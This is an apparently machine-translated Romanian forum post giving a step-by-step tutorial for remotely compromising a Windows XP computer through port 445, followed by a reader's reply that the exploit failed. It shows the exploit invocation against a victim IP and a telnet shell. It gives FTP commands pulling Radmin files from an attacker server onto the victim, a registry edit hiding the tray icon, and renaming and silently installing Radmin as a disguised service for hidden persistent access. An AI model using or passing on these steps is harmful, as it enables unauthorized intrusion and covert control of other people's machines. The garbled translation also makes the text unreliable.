La distanță hacking PC prin portul 445

Acum, să aibă grijă de propria lui anonimatul, a pus prog VMWare (cine știe în ea, explică esența lucrării - instalarea și pornirea altor oaspete, sisteme de operare de active în mod curent, astfel încât să puteți configura sistemul de operare musafir pentru a rula pe rețeaua locală, cu ea va avea IP lor, astfel încât dvs. principal unde să strălucească), dar dacă nu se tem că treci departe la unchiul imens, curata fata de presupusul accident formatnut șurub, nu utilizați =)

Apoi, deschide o emulare DOS, cat mai multe 2 ferestre, va fi de la una la atac, cu un alt port de Konekt telnet cultural pe victimă;) în cazul în care vă telnet teribil, luați Pyuti pe același amplasament.

Start - Run: CMD
Fereastra Dosa: (să zicem eksploit pereymenuvali în expl, de ce un astfel de nume lung pentru noi până când găsiți toate literele pot înscrie ceea ce sa despicat făcea el și a pus în C: \ Temp)

C: \ Temp \ Expl 666 0 123.456.789.666 (apasam Enter), apoi 0 înseamnă că axa este în Windows XP Pro victimă, victima 123.456.789.666 IP deschide portul 666 pentru telnet, dacă vom vedea agățat fereastra după cum se va întâmpla, atunci totul este în regulă = ) (nu uita, ip compus din 4 octeți, adică 0-255,0-255,0-255,0-255, în acest exemplu, folosind ip-ul greșit din motive personale)
[*] Țintă: IP: 123.456.789.666: Sistem de operare Windows XP Professional ... [*] Conectarea la 123.456.789.666:445 ... OK [*] Atacarea ... OK

cd - du-te la catalog;
get - descărca fișierul de pe server;
pune - descărca fișierul pe server
gestiona fișierele noastre, completați și swing printr-o conexiune telnet, după care permite binar, altfel fișierele vor fi nu pornește, descărcați fișiere din directorul FTP, în cazul în care ne aflăm acum, un exemplu de: (\ \ muzica de intrare \ dethmetall \ I_hask_you_dear_lamer - acesta este directorul nostru secret, este încă foarte un punct important pe FTP ar trebui să aibă acces la una dintre directoarele de înregistrare, în cazul în care nu, sunt în căutarea pentru un program și de a face FTP)

Încărcați fișiere pe server, deschide un DOS-emulsie, apoi:

ftp -A 123.456.789.101
CD-ul de intrare
CD cu muzică
cd dethmetall
cd I_xask_you_dear_lamer (suntem acum într-o locație secretă, completați aici)
binar (o copie binar (!) Mod)
a pus r_server.exe
a pus raddrv.dll
pune AdmDll.dll (acum fișierele de pe ftp)
pa (ftp output)
Acum am ajuns la aceeași telnet curent:
ftp -A 123.456.789.101
CD-ul de intrare
CD cu muzică
cd dethmetall
cd I_xask_you_dear_lamer (suntem acum într-un dosar secret,)
ls (verificați pentru a vedea dacă fișierele noastre sunt acolo)
r_server.exe
raddrv.dll
AdmDll.dll (bine, toate cele trei fișiere sunt prezente)
get r_server.exe
get raddrv.dll
obține AdmDll.dll (fișiere sunt acum pe „masina de inamic“)
pa (părăsi FTP)
(Când robotul cu FTP este sensibil la majuscule, fișierele sunt copiate în directorul de la care ne-am dus pe ftp, în acest caz, \ System32 \) să continue să lucreze pe ascuns Radmin de la utilizatorul nostru, și atunci el ar fi mai inteligent decât ne-am asumat (nu subestimați niciodată ( !)).

Lucrăm cu registru

Suntem într-o conexiune telnet cu atacul și să scrie: REG ADD HKLM \ System \ Radmin \ v2.0 \ server \ Parameters / v DisableTrayIcon / t REG_BINARY / d 01000000 (această opțiune ascunde tava zanachek Radmin)

Acum, lucrează cu procesul dacă rulați serverul Radmin, veți vedea ceva neplăcut, procesul de r_server acolo, dar aproximativ 5 procese svchost.exe, care nu vor fi vizibile în cazul în care acestea vor fi 6, în acest scop, doar o comandă redenumire: REN r_server.exe svchost .exe.exe (deghizat) este acum în scriere telnet: svchost.exe.exe / treci: lamer_nash / Port: 666 / install / salva / tăcere (treci cheie - parola pentru Konekt;
Port - portul schimbare la alegerea lor:
instalați - Pentru a instala serviciul cum ar fi;
salvați - acum acești parametri sunt ambii umolchatiyu;
tăcere - nici o ascensiuni pe o fereastră mașină de compromis „Setări salvate“)
Acum, rulați comanda la server
svchost.exe.exe / Start
așteptați ca sistemul să digere că din ea doresc, depinde de luare de utilizator atakovany lansează cu masina Radmin radmin.exe client și se conectează la 123456789666: 666 Acum vom fi întotdeauna în mâinile de la calculator, de asemenea, am instalat Radmin ca un serviciu pentru cei juzverej timp cât acest lucru nu devine mai inteligent, sau să găsiți mai inteligent, sau Windu 10 dolari verzi pe cineva el nu a rearanja =). Punct pozitiv: 10-13% au protecție și nu au rupt instrumente, este fericit, este în valoare de vedere, este necesar și fairvol antivirus sau nu după citirea acestui material.

Buna ziua.
În urma instrucțiunile, am ajunge la cmog mesaje in fereastra telnet: „conexiuni la gazdă pierdut.“ niciodată zakonnektivshis.
Ckompilirovanny eksploit Am descarcat mesaj *] Target: IP: 123.456.789.666: Sistem de operare Windows XP Professional ... [*] Conectarea la 123.456.789.666:445 ... OK [*] Atacarea ... OK -Ia
la „sub atac“ nu a stat nici anivirusa PC și nici faeyrvola.
Ajută-vă rugăm să înțelegeți.
Fixed un bug ar putea deja?

__________________
[COLOR = "Purple"] [B] [I] [U] detecta mai bine mintea în tăcere decât în conversații. [/ U] [/ I] [/ B] [/ COLOR]